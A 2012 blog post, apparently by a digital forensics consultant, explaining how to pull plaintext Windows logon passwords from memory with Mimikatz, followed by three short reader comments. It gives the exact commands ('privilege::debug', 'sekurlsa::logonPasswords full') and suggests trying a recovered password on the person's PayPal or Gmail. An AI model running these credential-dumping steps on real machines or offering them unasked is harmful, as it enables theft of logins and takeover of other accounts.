Monday, October 1, 2012

Password extraction fun

Extraction of passwords whether remotely or by gaining physical access to a computer is always an area of interest for my clients.  If you can acquire the Windows password this can be very useful, users often consider their OS to need a very strong password, not realising that they are very easy to crack.  The average number of passwords used by a person tends to not exceed 3, or derivatives of 3.  If you get the Windows password it tends to be the 'strong' one that they use and so applying it to their Paypal, Gmail etc you might be successful.

Generally the way to grab the password is to dump the LM/NT hashes either by grabbing the SAM or from a RAM dump and then use Rainbow tables (or a dictionary or brute force attack) to decrypt the plain text.  This is not terribly hard but requires some knowledge and there is always the possibility of the crack not coming through for you.

Somehow I had missed the release of a tool called Mimikatz written by a chap with an extraordinary ability to undermine security holes within Microsoft (and has a penchant for writing everything in French, tres bien).  If you would like to know how his technique works then please take the time our to read his cracking Powerpoint click here (Thankfully not in French!). Thanks to my friend Jon Evans who mentioned it to me last week.

Mimikatz can achieve a number of things but the most useful to me is its claim to extract plain text user passwords.  Guess what - it works!

Here's what to do.

Download Mimikatz

Run the 32bit or 64bit version as administrator (please dont make me explain how you would know which!!) and you are presented with a console environment.


Next get into debug mode with the command:-
privilege::debug


Next simply dump the passwords by running:-
sekurlsa::logonPasswords full
Job done!


Username - nickfx
Password - 123

Easy eh!

This is an extremely useful addition to any first responder toolkit and I highly recommend having a go for 10 minutes.




3 comments:

Binarybod said...

Thanks for this Nick

By the way, you need a stronger password. Publishing the one you do have in your blog isn't too bright either ;)

Nick Furneaux said...

LOL! Darn it, there was me thinking that 123 would cut the mustard. Ahh I just released it again. Will revert back to the password 'password', bound to fool those pesky hackers!

Matt Hahn said...

Nice easy tool to add to the collection. Thanks